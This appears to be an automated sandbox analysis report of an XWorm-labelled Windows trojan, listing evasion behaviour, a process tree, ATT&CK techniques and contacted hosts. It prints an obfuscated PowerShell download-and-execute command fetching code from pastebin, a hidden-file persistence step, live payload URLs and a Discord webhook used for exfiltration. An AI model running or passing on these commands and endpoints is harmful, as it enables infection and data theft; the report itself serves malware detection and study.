Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

Malware Analysis System Evasion

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_VideoController
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 590938
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 590813
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 590686
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 590577
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4822
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4816
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6309
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3243
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5374
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4242
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5592
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4068
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1351
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7425
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2295
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 847
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6319
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3402
Source: C:\Windows\System32\loaddll64.exe TID: 4888Thread sleep time: -120000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7616Thread sleep time: -17524406870024063s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7660Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7472Thread sleep count: 6309 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7620Thread sleep time: -22136092888451448s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7724Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7424Thread sleep count: 3243 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7488Thread sleep count: 5374 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7500Thread sleep count: 4242 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7612Thread sleep time: -25825441703193356s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7700Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7608Thread sleep time: -23058430092136925s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7656Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1920Thread sleep count: 1351 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 744Thread sleep count: 149 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2080Thread sleep count: 189 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1916Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3088Thread sleep count: 7425 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1168Thread sleep time: -26747778906878833s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1056Thread sleep count: 2295 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3824Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1168Thread sleep time: -590938s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1168Thread sleep time: -590813s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1168Thread sleep time: -590686s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1168Thread sleep time: -590577s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2060Thread sleep count: 847 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3380Thread sleep count: 164 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2176Thread sleep count: 200 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2184Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3868Thread sleep count: 6319 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6408Thread sleep count: 3402 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2348Thread sleep time: -23058430092136925s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7548Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
Source: C:\Windows\System32\loaddll64.exeThread delayed: delay time: 120000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 590938
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 590813
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 590686
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 590577
Source: powershell.exe, 0000000D.00000002.1783891772.000002476F9C9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllR
Source: powershell.exe, 00000007.00000002.1752473961.00000193E8AB6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllRR
Source: powershell.exe, 00000014.00000002.2360276235.000002152C37F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlls
Source: powershell.exe, 00000008.00000002.2184620731.000001851BA80000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2197283163.00000148CB230000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2415473868.000001B76A150000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\5UIy3bo46y.dll",#1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\attrib.exe "C:\Windows\system32\attrib.exe" +s +h "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft OneDrive\FileSync VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
MITRE ATT&CK Matrix (one line per tactic column; the digits are those shown beside the technique in the matrix):

Reconnaissance: Gather Victim Identity Information | Credentials | Email Addresses | Employee Names | Gather Victim Network Information | Domain Properties | DNS | Network Trust Dependencies
Resource Development: Acquire Infrastructure | Domains | DNS Server | Virtual Private Server | Server | Botnet | Web Services | Serverless
Initial Access: Spearphishing Link (1) | Default Accounts | Domain Accounts | Local Accounts | Cloud Accounts | Replication Through Removable Media | External Remote Services | Drive-by Compromise
Execution: Windows Management Instrumentation (111) | Command and Scripting Interpreter (2) | PowerShell (2) | Cron | Launchd | Scheduled Task | Systemd Timers | Container Orchestration Job
Persistence: Registry Run Keys / Startup Folder (11) | DLL Side-Loading (1) | Logon Script (Windows) | Login Hook | Network Logon Script | RC Scripts | Startup Items | Scheduled Task/Job
Privilege Escalation: Process Injection (11) | Registry Run Keys / Startup Folder (11) | DLL Side-Loading (1) | Login Hook | Network Logon Script | RC Scripts | Startup Items | Scheduled Task/Job
Defense Evasion: Masquerading (1) | Virtualization/Sandbox Evasion (131) | Process Injection (11) | Deobfuscate/Decode Files or Information (1) | Obfuscated Files or Information (1) | Regsvr32 (1) | Rundll32 (1) | DLL Side-Loading (1)
Credential Access: OS Credential Dumping | LSASS Memory | Security Account Manager | NTDS | LSA Secrets | Cached Domain Credentials | DCSync | Proc Filesystem
Discovery: Security Software Discovery (111) | Process Discovery (1) | Virtualization/Sandbox Evasion (131) | Application Window Discovery (1) | File and Directory Discovery (1) | System Information Discovery (12) | Remote System Discovery | System Owner/User Discovery
Lateral Movement: Remote Services | Remote Desktop Protocol | SMB/Windows Admin Shares | Distributed Component Object Model | SSH | VNC | Windows Remote Management | Cloud Services
Collection: Archive Collected Data (1) | Data from Removable Media | Data from Network Shared Drive | Input Capture | Keylogging | GUI Input Capture | Web Portal Capture | Credential API Hooking
Command and Control: Web Service (1) | Encrypted Channel (11) | Ingress Tool Transfer (3) | Non-Application Layer Protocol (4) | Application Layer Protocol (15) | Multiband Communication | Commonly Used Port | Application Layer Protocol
Exfiltration: Exfiltration Over Other Network Medium | Exfiltration Over Bluetooth | Automated Exfiltration | Traffic Duplication | Scheduled Transfer | Data Transfer Size Limits | Exfiltration Over C2 Channel | Exfiltration Over Alternative Protocol
Impact: Abuse Accessibility Features | Network Denial of Service | Data Encrypted for Impact | Data Destruction | Data Encrypted for Impact | Service Stop | Inhibit System Recovery | Defacement
Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
Behavior Graph ID: 1534111 | Sample: 5UIy3bo46y.exe | Startdate: 15/10/2024 | Architecture: WINDOWS | Score: 100

Process tree (indentation = started by the process above; signatures in square brackets; network contacts and dropped files listed under the process that produced them):

Start
  [Suricata IDS alerts for network traffic; Malicious sample detected (through community Yara rule); Multi AV Scanner detection for submitted file; 3 other signatures]
  network: pastebin.com [Connects to a pastebin service (likely for C&C)]; time.windows.com; 5 other IPs or domains
  loaddll64.exe 1  [Obfuscated command line found]
    rundll32.exe  [Obfuscated command line found]
      powershell.exe 16  [Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines); Suspicious powershell command line found; Uses cmd line tools excessively to alter registry or file data; Powershell creates an autostart link]
        network: pastebin.com 104.20.3.235, 443, 49752, 49753 CLOUDFLARENETUS United States; discord.com 162.159.128.233, 443, 52049, 52050 CLOUDFLARENETUS United States
        conhost.exe
    cmd.exe 1
      rundll32.exe  [Obfuscated command line found]
        powershell.exe  [Uses cmd line tools excessively to alter registry or file data; Tries to open files direct via NTFS file id]
          dropped: C:\ProgramData\...\BeginSync.lnk, MS
          conhost.exe
          attrib.exe 1
    regsvr32.exe
      powershell.exe
        network: raw.githubusercontent.com 185.199.109.133, 443, 49759, 49760 FASTLYUS Netherlands
        conhost.exe
        attrib.exe 1
    2 other processes
      network: tinyurl.com 104.18.111.161, 49743, 49744, 49745 CLOUDFLARENETUS United States
  forfiles.exe 1  [Suspicious powershell command line found]
    powershell.exe 7  [Suspicious powershell command line found]
      powershell.exe 13
    conhost.exe 1
  forfiles.exe 1
    powershell.exe
      powershell.exe
    conhost.exe 1

Source | Detection | Scanner | Label | Link
5UIy3bo46y.dll | 50% | ReversingLabs | Win64.Trojan.XWorm |
No Antivirus matches
Source | Detection | Scanner | Label | Link
http://nuget.org/NuGet.exe | 0% | URL Reputation | safe |
http://pesterbdd.com/images/Pester.png | 0% | URL Reputation | safe |
https://go.micro | 0% | URL Reputation | safe |
https://contoso.com/License | 0% | URL Reputation | safe |
https://contoso.com/Icon | 0% | URL Reputation | safe |
https://contoso.com/ | 0% | URL Reputation | safe |
https://nuget.org/nuget.exe | 0% | URL Reputation | safe |
https://aka.ms/pscore68 | 0% | URL Reputation | safe |
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe |
Name | IP | Active | Malicious | Antivirus Detection | Reputation
tinyurl.com | 104.18.111.161 | true | false | | unknown
discord.com | 162.159.128.233 | true | true | | unknown
raw.githubusercontent.com | 185.199.109.133 | true | true | | unknown
s-part-0017.t-0009.t-msedge.net | 13.107.246.45 | true | false | | unknown
pastebin.com | 104.20.3.235 | true | true | | unknown
time.windows.com | unknown | unknown | true | | unknown
Name | Malicious | Antivirus Detection | Reputation
http://tinyurl.com/yeykydun | false | | unknown
http://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt | false | | unknown
https://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt | false | | unknown
http://pastebin.com/raw/sA04Mwk2 | false | | unknown
https://pastebin.com/raw/sA04Mwk2 | false | | unknown
https://discord.com/api/webhooks/1285453590428782614/2ICVsBAPEUQjq3aCyFPX9ce6WexTwa29I1FddkY5ZuTql0_efW5EguYXiAyCvsMrX7i2 | true | | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
http://nuget.org/NuGet.exe | powershell.exe, 00000007.00000002.1726191854.0000019390073000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1726191854.00000193901B6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1745911441.00000247675A3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1745911441.00000247676E6000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://discord.com | powershell.exe, 00000007.00000002.1650878851.0000019380448000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1650878851.0000019382060000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1773563373.0000018503C82000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1775512981.00000148B368A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1652165646.0000024757A40000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1652165646.0000024759677000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1951674097.0000021515635000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2026955387.000001B753227000.00000004.00000800.00020000.00000000.sdmp | true | | unknown
https://discord.com/api/webhooks/1285453590428782614/2ICVsBAPEUQjq3aCyFPX9ce6WexTwa29I1FddkY5ZuTql0_ | powershell.exe, 00000018.00000002.2026955387.000001B75290F000.00000004.00000800.00020000.00000000.sdmp | true | | unknown
http://pesterbdd.com/images/Pester.png | powershell.exe, 0000000D.00000002.1652165646.0000024757755000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://discord.com/api/webhooks/1285453590428782614/2ICVsBAPEUQ | powershell.exe, 00000007.00000002.1650878851.000001938174E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1773563373.0000018504C8C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1775512981.00000148B469A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1652165646.0000024758C62000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1951674097.0000021514D4A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2026955387.000001B75290F000.00000004.00000800.00020000.00000000.sdmp | true | | unknown
http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 0000000D.00000002.1652165646.0000024757755000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
https://go.micro | powershell.exe, 00000007.00000002.1650878851.0000019380E48000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1773563373.00000185047CF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1775512981.00000148B37D5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1652165646.0000024758440000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1951674097.000002151474A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2026955387.000001B752286000.00000004.00000800.00020000.00000000.sdmp | true | URL Reputation: safe | unknown
https://discord.comP | powershell.exe, 00000018.00000002.2026955387.000001B753227000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
http://www.microsoft.co | powershell.exe, 00000007.00000002.1761764309.00000193E8BBD000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2364535890.000002152C3C0000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
